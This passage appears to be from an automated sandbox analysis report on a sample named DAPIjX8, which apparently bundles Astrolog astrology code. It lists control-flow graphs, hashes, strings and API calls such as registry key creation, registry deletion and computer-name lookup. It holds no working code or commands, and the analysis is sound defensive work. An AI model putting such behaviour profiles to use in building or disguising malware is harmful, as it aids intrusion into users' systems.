                                  • Opcode ID: 1338866b2c3a02d0ec336459f934162f21c62a7b88ae211b20dd733c10737ede
                                  • Instruction ID: c6e7b88f8f3cbc9786cc4e93138ed0c2f04f0de870f558174a7f8b61b1f02c7c
                                  • Opcode Fuzzy Hash: 1338866b2c3a02d0ec336459f934162f21c62a7b88ae211b20dd733c10737ede
                                  • Instruction Fuzzy Hash: 4DB13971D00A589BDB25CB24CC55BFEB771EF55305F1082D8E908AB292EB74ABC58F90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2069 6c654afa-6c654b24 2070 6c654b26-6c654b29 call 6c6547b5 2069->2070 2071 6c654b3b-6c654b5a call 6c6b2a1f call 6c6b2220 2069->2071 2074 6c654b2e-6c654b35 2070->2074 2080 6c654b84-6c654b8d call 6c6b3b76 2071->2080 2081 6c654b5c-6c654b82 call 6c6b1f84 call 6c6517c6 2071->2081 2074->2071 2076 6c654bec-6c654c06 call 6c6b1f75 2074->2076 2088 6c654b9d-6c654ba6 call 6c6b3b76 2080->2088 2089 6c654b8f-6c654b9b call 6c6b2a1f 2080->2089 2093 6c654beb 2081->2093 2096 6c654bb4-6c654bbc 2088->2096 2097 6c654ba8-6c654bb2 2088->2097 2089->2080 2089->2088 2093->2076 2098 6c654bbd-6c654bc6 call 6c6b3b76 2096->2098 2097->2093 2101 6c654be3 2098->2101 2102 6c654bc8-6c654bd8 call 6c6b2a1f 2098->2102 2101->2093 2102->2101 2105 6c654bda-6c654be1 2102->2105 2105->2098 2105->2101
                                  APIs
                                  • _fgetc.LIBCMT ref: 6C654B43
                                  • _sprintf.LIBCMT ref: 6C654B6F
                                    • Part of subcall function 6C6547B5: _sprintf.LIBCMT ref: 6C6547FA
                                    • Part of subcall function 6C6547B5: _sprintf.LIBCMT ref: 6C654846
                                    • Part of subcall function 6C6547B5: GetModuleFileNameA.KERNEL32(?,000000FF,?,?,?,00000000,00000000), ref: 6C654860
                                    • Part of subcall function 6C6547B5: _sprintf.LIBCMT ref: 6C6548A1
                                    • Part of subcall function 6C6547B5: _sprintf.LIBCMT ref: 6C6548D5
                                    • Part of subcall function 6C6547B5: _sprintf.LIBCMT ref: 6C65491C
                                  • _fgetc.LIBCMT ref: 6C654B90
                                  • _fgetc.LIBCMT ref: 6C654BC9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf$_fgetc$FileModuleName
                                  • String ID: $@$The command file '%s' is not in any valid format (character %d).
                                  • API String ID: 1310815430-447543786
                                  • Opcode ID: d7bf9843c273be4a6cb0c821ac52483726ea5fbcec3e9d63614f190ec2fcd11f
                                  • Instruction ID: 17b49ed71e2affb3a553c3d528e74fd1b18e0cfda26e060e5bdf0a10ba0abe2a
                                  • Opcode Fuzzy Hash: d7bf9843c273be4a6cb0c821ac52483726ea5fbcec3e9d63614f190ec2fcd11f
                                  • Instruction Fuzzy Hash: 81210A71E051156AD7219A19DC44FEE77FC9B9331CF5001E9E608B3A00DB744ABA875D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2106 6c6783bc-6c6783ee 2107 6c6783f0-6c6783fb 2106->2107 2108 6c6783fd 2106->2108 2109 6c678403-6c678411 2107->2109 2108->2109 2110 6c678413-6c67841b 2109->2110 2110->2110 2111 6c67841d-6c67844d call 6c6879d0 2110->2111 2114 6c678575-6c6785a3 call 6c6b1f84 2111->2114 2115 6c678453-6c678466 2111->2115 2120 6c6785a5-6c6785ad 2114->2120 2121 6c6785b9 2114->2121 2117 6c678468-6c678470 2115->2117 2117->2117 2119 6c678472-6c678484 2117->2119 2122 6c678486-6c67848c 2119->2122 2123 6c67848e-6c678494 2119->2123 2124 6c6785af-6c6785b7 2120->2124 2125 6c6785bb-6c6785c9 call 6c6b1f75 2121->2125 2126 6c6784c8-6c6784ce 2122->2126 2127 6c678497-6c67849c 2123->2127 2124->2121 2124->2124 2128 6c6784d1-6c6784d6 2126->2128 2127->2127 2130 6c67849e-6c6784a6 2127->2130 2128->2128 2131 6c6784d8-6c6784e2 2128->2131 2130->2126 2133 6c6784a8-6c6784b0 2130->2133 2134 6c6784e5-6c6784ea 2131->2134 2133->2126 2135 6c6784b2-6c6784b8 2133->2135 2134->2134 2137 6c6784ec-6c6784f7 2134->2137 2136 6c6784b9-6c6784bf 2135->2136 2136->2136 2138 6c6784c1-6c6784c6 2136->2138 2139 6c6784fd-6c678503 2137->2139 2140 6c6785ca-6c6785d0 2137->2140 2138->2126 2141 6c678505-6c67850a 2139->2141 2140->2121 2142 6c6785d2-6c6785e6 call 6c6b1f84 2140->2142 2141->2141 2143 6c67850c-6c678514 2141->2143 2142->2121 2145 6c678515-6c67851b 2143->2145 2145->2145 2147 6c67851d-6c67853b 2145->2147 2148 6c67853d-6c678545 2147->2148 2148->2148 2149 6c678547-6c678552 call 6c6b24fa 2148->2149 2151 6c678557-6c67855b 2149->2151 2151->2125 2152 6c67855d-6c67856f 2151->2152 2152->2114 2152->2115
                                  APIs
                                  Strings
                                  • SwissEph file '%s' not found in PATH '%s', xrefs: 6C678587
                                  • .;C:\Astrolog\, xrefs: 6C6783DE
                                  • error: file path and name must be shorter than %d., xrefs: 6C6785D3
                                  • \, xrefs: 6C6784A8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _sprintf
                                  • String ID: .;C:\Astrolog\$SwissEph file '%s' not found in PATH '%s'$\$error: file path and name must be shorter than %d.
                                  • API String ID: 1467051239-2281980244
                                  • Opcode ID: 5bd6788b615cd0beef1db4c87d7850afae58f45f7ff0b00676368fc44d4578bd
                                  • Instruction ID: 3e8a1bcb737882c0a11e0d2921fe8bbf675e87b366c1a49b53ae87cc5ff73823
                                  • Opcode Fuzzy Hash: 5bd6788b615cd0beef1db4c87d7850afae58f45f7ff0b00676368fc44d4578bd
                                  • Instruction Fuzzy Hash: 7151FBB0A0416D8FDB21DE38CD546D9BBF5AB49308F0489F5D288F7611E6304EC98F68

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2153 1001f1b0-1001f262 LoadLibraryW RegCreateKeyExW 2160 1001f264-1001f279 RegOpenKeyExW 2153->2160 2161 1001f2a7-1001f2ae call 1001f2cd 2153->2161 2160->2161 2162 1001f27b-1001f2a4 lstrlenW RegSetValueExW 2160->2162 2164 1001f2b3-1001f2c6 2161->2164 2162->2161
                                  APIs
                                  • LoadLibraryW.KERNEL32(100782C8,10081068), ref: 1001F1F4
                                  • RegCreateKeyExW.KERNEL32(80000001,1003AC40,00000000,00000000,00000000,000F003F,00000000,000000FE,?), ref: 1001F25D
                                  • RegOpenKeyExW.KERNEL32(80000001,1003AC40,00000000,0002001F,000000FE), ref: 1001F274
                                  • lstrlenW.KERNEL32(?), ref: 1001F27F
                                  • RegSetValueExW.KERNEL32(000000FE,?,00000000,00000001,?,00000000), ref: 1001F297
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CreateLibraryLoadOpenValuelstrlen
                                  • String ID: Time
                                  • API String ID: 1375638161-3483776891
                                  • Opcode ID: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                  • Instruction ID: da749f221406ebe725311cc99906b7a6f75a18cf87e871c10c78f3a2f2c99309
                                  • Opcode Fuzzy Hash: 66dc3ac0a5c7e6bf8b4a1d02e65aac9550fe6383deacdd14883f52ca131d7556
                                  • Instruction Fuzzy Hash: 9E313A71D0022DBFEB00DFA9CC84EEEBABDEF49654F10412AFA15E2210DB7859408B64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2165 6c67faa9-6c67fae9 2166 6c67faee-6c67fb0c call 6c67f16f call 6c6766bd 2165->2166 2167 6c67faeb 2165->2167 2172 6c67fb0e-6c67fb15 2166->2172 2173 6c67fb2d-6c67fb39 2166->2173 2167->2166 2172->2173 2176 6c67fb17-6c67fb19 2172->2176 2174 6c67fb93-6c67fba3 2173->2174 2175 6c67fb3b-6c67fb47 call 6c676655 2173->2175 2177 6c67fba5-6c67fbac 2174->2177 2178 6c67fbc4 2174->2178 2185 6c67fb55-6c67fb5a 2175->2185 2186 6c67fb49-6c67fb4e call 6c6713bf 2175->2186 2176->2173 2180 6c67fb1b-6c67fb2b 2176->2180 2177->2178 2181 6c67fbae-6c67fbc2 call 6c679261 2177->2181 2183 6c67fbc6-6c67fc49 call 6c67efae call 6c67f064 call 6c6b1f84 2178->2183 2180->2173 2181->2183 2204 6c67fc53 2183->2204 2205 6c67fc4b-6c67fc51 2183->2205 2190 6c67fb5f-6c67fb63 2185->2190 2186->2185 2193 6c67fb65-6c67fb6b call 6c6b28b7 2190->2193 2194 6c67fb6c-6c67fb86 call 6c6bedb0 2190->2194 2193->2194 2194->2190 2203 6c67fb88-6c67fb8e 2194->2203 2203->2174 2206 6c67fc59-6c67fc72 2204->2206 2205->2206 2207 6c67fc74-6c67fc7c 2206->2207 2208 6c67fc7e-6c67fc8e 2206->2208 2209 6c67fc94-6c67fccd call 6c68301a 2207->2209 2208->2209 2212 6c67fd12-6c67fd21 2209->2212 2213 6c67fccf-6c67fd0f call 6c68817c call 6c684712 * 2 2209->2213 2215 6c67fd23-6c67fd40 call 6c685db6 call 6c6785e8 2212->2215 2216 6c67fd5d-6c67fd75 2212->2216 2213->2212 2215->2216 2241 6c67fd42-6c67fd5a call 6c685c0c 2215->2241 2217 6c67fd77-6c67fd79 2216->2217 2218 6c67fde8-6c67fdf1 2216->2218 2223 6c67fd7f-6c67fdb1 call 6c67726b 2217->2223 2224 6c67fd7b-6c67fd7d 2217->2224 2221 6c67fdf3-6c67fe20 call 6c680e52 2218->2221 2222 6c67fe70-6c67fe77 2218->2222 2242 6c67fdb3-6c67fdb6 2221->2242 2243 6c67fe22-6c67fe41 call 6c680e52 2221->2243 2229 6c67fe9b-6c67fea0 2222->2229 2230 6c67fe79-6c67fe7c 2222->2230 2223->2242 2246 6c67fdbb-6c67fddc call 6c67726b 2223->2246 2224->2218 2224->2223 2239 6c67fea2-6c67fea5 2229->2239 2240 6c67fecb-6c67fecf 2229->2240 2235 6c67fe83-6c67fe99 2230->2235 2236 6c67fe7e-6c67fe81 2230->2236 2235->2229 2236->2229 2236->2235 2239->2240 2248 6c67fea7 2239->2248 2244 6c67fed5-6c67feeb 2240->2244 2245 6c680006-6c68000c 2240->2245 2241->2216 2254 6c680229-6c680237 call 6c6b1f75 2242->2254 2243->2242 2264 6c67fe47-6c67fe6c 2243->2264 2253 6c67feed-6c67ff15 2244->2253 2249 6c680012-6c68001b 2245->2249 2250 6c67fea9-6c67feaf 2245->2250 2261 6c67fde1-6c67fde6 2246->2261 2248->2250 2263 6c680026 2249->2263 2256 6c67feb1-6c67fec7 2250->2256 2253->2253 2259 6c67ff17-6c67ff1d 2253->2259 2256->2256 2262 6c67fec9 2256->2262 2265 6c67ff43-6c67ff45 2259->2265 2266 6c67ff1f-6c67ff26 2259->2266 2261->2218 2261->2242 2262->2259 2268 6c68002b-6c680031 2263->2268 2264->2264 2269 6c67fe6e 2264->2269 2271 6c67ff47-6c67ff4e 2265->2271 2272 6c67ff76-6c67ff7d 2265->2272 2266->2265 2270 6c67ff28-6c67ff40 call 6c67abd5 2266->2270 2275 6c680041-6c68004a 2268->2275 2276 6c680033-6c680040 call 6c67a73a 2268->2276 2269->2229 2270->2265 2271->2272 2278 6c67ff50-6c67ff73 call 6c67a96a 2271->2278 2273 6c67ffb2-6c67ffc1 2272->2273 2274 6c67ff7f-6c67ff91 call 6c6785e8 2272->2274 2273->2263 2281 6c67ffc3-6c67ffe4 call 6c684712 2273->2281 2293 6c67ff93-6c67ff9a 2274->2293 2294 6c67ff9c-6c67ffaf call 6c685c0c 2274->2294 2282 6c680050-6c680076 call 6c682d1d 2275->2282 2283 6c6800e3-6c6800ea 2275->2283 2276->2275 2278->2272 2304 6c67ffe6-6c67fffc call 6c67a5e7 2281->2304 2305 6c67ffff-6c680004 2281->2305 2306 6c680078-6c680092 call 6c682d1d 2282->2306 2307 6c680095-6c680097 2282->2307 2288 6c6801a8-6c6801b1 2283->2288 2289 6c6800f0-6c6800fa 2283->2289 2297 6c6801bd-6c6801c4 2288->2297 2298 6c6801b3-6c6801b8 call 6c682e6b 2288->2298 2295 6c6800fc-6c68010f call 6c679dc8 2289->2295 2296 6c68012f-6c680134 2289->2296 2293->2273 2293->2294 2294->2273 2327 6c680112-6c680114 2295->2327 2310 6c680149-6c680175 call 6c682e6b call 6c679c91 2296->2310 2311 6c680136-6c680147 call 6c679ef2 2296->2311 2308 6c6801ee-6c680208 2297->2308 2309 6c6801c6-6c6801c8 2297->2309 2298->2297 2304->2305 2305->2268 2306->2307 2307->2283 2320 6c680099-6c6800be call 6c682d1d 2307->2320 2312 6c68020a-6c680212 2308->2312 2313 6c680214-6c68021b 2308->2313 2309->2308 2319 6c6801ca-6c6801d0 2309->2319 2310->2242 2339 6c68017b-6c6801a3 call 6c68301a 2310->2339 2311->2327 2312->2313 2324 6c68021d 2313->2324 2325 6c680221-6c680224 2313->2325 2330 6c6801d2-6c6801ea 2319->2330 2320->2283 2335 6c6800c0-6c6800e0 call 6c682d1d 2320->2335 2324->2325 2325->2254 2327->2242 2333 6c68011a-6c68011c 2327->2333 2330->2330 2334 6c6801ec 2330->2334 2333->2288 2337 6c680122-6c68012d 2333->2337 2334->2308 2335->2283 2337->2288 2339->2288
                                  APIs
                                  Strings
                                  • %s,%s, xrefs: 6C67FBF0
                                  • Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut(), xrefs: 6C67FB24
                                  • , xrefs: 6C67FFB2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _memset_sprintf
                                  • String ID: $%s,%s$Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut()
                                  • API String ID: 1557529856-1540576256
                                  • Opcode ID: 637ff4057a518b4037c455668929d79e51275e788874debc60ed9c90147b4fd1
                                  • Instruction ID: fc9afb559d60720649491ae76336681d21193dabec390369c1109a71cbdec18c
                                  • Opcode Fuzzy Hash: 637ff4057a518b4037c455668929d79e51275e788874debc60ed9c90147b4fd1
                                  • Instruction Fuzzy Hash: 6D223A72E0060DEBDF209F50D885BDD77B4FF06308F1549A9E8D866990EF318A58CB69

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2342 100425ec-100425fa 2343 100425fc-1004260d call 100497f1 call 100414b7 2342->2343 2344 1004260f-1004261f 2342->2344 2364 10042662-10042666 2343->2364 2346 10042634-1004263a 2344->2346 2347 10042621-10042632 call 100497f1 call 100414b7 2344->2347 2350 10042642-10042648 2346->2350 2351 1004263c 2346->2351 2369 10042661 2347->2369 2352 10042667-10042681 call 100518fa call 10050e74 2350->2352 2353 1004264a 2350->2353 2356 10042654-1004265e call 100497f1 2351->2356 2357 1004263e-10042640 2351->2357 2371 10042687-10042693 call 10050ea0 2352->2371 2372 10042872-1004288c call 100414e4 call 10051139 2352->2372 2353->2356 2358 1004264c-10042652 2353->2358 2367 10042660 2356->2367 2357->2350 2357->2356 2358->2352 2358->2356 2367->2369 2369->2364 2371->2372 2377 10042699-100426a5 call 10050ecc 2371->2377 2384 100428a1-100428a3 2372->2384 2385 1004288e-10042892 call 100425ec 2372->2385 2377->2372 2383 100426ab-100426c0 2377->2383 2386 10042730-1004273b call 10051177 2383->2386 2387 100426c2 2383->2387 2392 10042897-1004289f 2385->2392 2386->2367 2395 10042741-1004274c 2386->2395 2390 100426c4-100426ca 2387->2390 2391 100426cc-100426e8 call 10051177 2387->2391 2390->2386 2390->2391 2391->2367 2399 100426ee-100426f1 2391->2399 2392->2384 2397 1004274e-10042757 call 1005194d 2395->2397 2398 10042768 2395->2398 2397->2398 2407 10042759-10042766 2397->2407 2401 1004276b-1004277f call 10060030 2398->2401 2402 100426f7-10042700 call 1005194d 2399->2402 2403 1004286b-1004286d 2399->2403 2410 10042781-10042789 2401->2410 2411 1004278c-100427b3 call 1005fea0 call 10060030 2401->2411 2402->2403 2412 10042706-1004271e call 10051177 2402->2412 2403->2367 2407->2401 2410->2411 2420 100427b5-100427be 2411->2420 2421 100427c1-100427e8 call 1005fea0 call 10060030 2411->2421 2412->2367 2418 10042724-1004272b 2412->2418 2418->2403 2420->2421 2426 100427f6-10042805 call 1005fea0 2421->2426 2427 100427ea-100427f3 2421->2427 2430 10042807 2426->2430 2431 1004282d-1004284b 2426->2431 2427->2426 2434 1004280d-10042821 2430->2434 2435 10042809-1004280b 2430->2435 2432 1004284d-10042866 2431->2432 2433 10042868 2431->2433 2432->2403 2433->2403 2434->2403 2435->2434 2436 10042823-10042825 2435->2436 2436->2403 2437 10042827 2436->2437 2437->2431 2438 10042829-1004282b 2437->2438 2438->2403 2438->2431
                                  APIs
                                  • __allrem.LIBCMT ref: 10042776
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10042792
                                  • __allrem.LIBCMT ref: 100427A9
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100427C7
                                  • __allrem.LIBCMT ref: 100427DE
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100427FC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 1992179935-0
                                  • Opcode ID: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                  • Instruction ID: d5479bc1b746727abca6d8f9757406ec68e7b7bbf4155c34677e3b1bd49904a4
                                  • Opcode Fuzzy Hash: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                  • Instruction Fuzzy Hash: B481F376B01B06ABE710DE69CC82B5A73E9EF40764F71423EF510D7281EB70E9048B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,%s$.;C:\Astrolog\$NULL
                                  • API String ID: 0-2992153177
                                  • Opcode ID: 6bfdc38b7d89f2a65964f07c895d4ea8e877c50883b6ce4fadac8cca0b723c21
                                  • Instruction ID: ac12d22db0769ea3f5a4d798c06f89baad6f782bcfb57386e2a1e5ec9d7b53d4
                                  • Opcode Fuzzy Hash: 6bfdc38b7d89f2a65964f07c895d4ea8e877c50883b6ce4fadac8cca0b723c21
                                  • Instruction Fuzzy Hash: 6C71E8719051599FCF21CF289894FE9BBF8AF06318F244AB9D054D7691DB304A85CF29
                                  APIs
                                    • Part of subcall function 6C651472: _sprintf.LIBCMT ref: 6C6514BC
                                    • Part of subcall function 6C651472: _sprintf.LIBCMT ref: 6C6514E0
                                  • __CxxThrowException@8.LIBCMT ref: 6C6340AA
                                    • Part of subcall function 6C6C0FF1: KiUserExceptionDispatcher.NTDLL(?,?,6C6B5E3B,?,?,?,?,?,6C6B5E3B,?,6C722DBC,6C750A30), ref: 6C6C1033
                                  • _memset.LIBCMT ref: 6C6340C4
                                  • GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 6C6340D9
                                  • MessageBoxA.USER32(00000000,GameBegin,00000000,00000000), ref: 6C6340F4
                                    • Part of subcall function 6C692A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\.as,?,?,6C68DE40), ref: 6C692A85
                                    • Part of subcall function 6C692A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\Astrolog.as,?,?,6C68DE40), ref: 6C692A91
                                    • Part of subcall function 6C6465F4: _memset.LIBCMT ref: 6C64662D
                                    • Part of subcall function 6C6465F4: _memset.LIBCMT ref: 6C646643
                                    • Part of subcall function 6C646B34: _memset.LIBCMT ref: 6C646B68
                                    • Part of subcall function 6C6B2E33: _doexit.LIBCMT ref: 6C6B2E3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247704451.000000006C631000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C630000, based on PE: true
                                  • Associated: 00000009.00000002.3247658291.000000006C630000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247950943.000000006C727000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3247979957.000000006C729000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248027784.000000006C74D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248067369.000000006C74E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C750000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C753000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C758000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C75E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248131092.000000006C760000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000009.00000002.3248260526.000000006C763000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_6c630000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _memset$Delete_sprintf$DispatcherExceptionException@8FileMessageModuleNameThrowUser_doexit
                                  • String ID: GameBegin
                                  • API String ID: 2408732992-2407867525
                                  • Opcode ID: 8c50e166e30f3edbcf798cacc954d2199d9702de07800efb2c12a2eb999b1e86
                                  • Instruction ID: 496d2cbb449d14c694d75a33c562c0254546ef214e80753ad6a6727c459cdbb7
                                  • Opcode Fuzzy Hash: 8c50e166e30f3edbcf798cacc954d2199d9702de07800efb2c12a2eb999b1e86
                                  • Instruction Fuzzy Hash: 8F21D8707012289BDF00AFB0C8C19E87BB8EB2634CB10747BD158C2A01DB79C589CB6D
                                  APIs
                                  • GetComputerNameW.KERNEL32(?,00000200), ref: 1001CB27
                                  • lstrcpyW.KERNEL32(?,10077510), ref: 1001CB3D
                                  • wsprintfW.USER32 ref: 1001CB69
                                  • lstrlenW.KERNEL32(?), ref: 1001CB73
                                  Strings
                                  Memory Dump Source
